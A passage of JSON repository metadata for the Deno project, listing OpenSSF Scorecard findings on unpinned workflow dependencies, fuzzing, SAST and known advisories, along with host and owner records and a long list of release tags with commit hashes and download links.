not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_u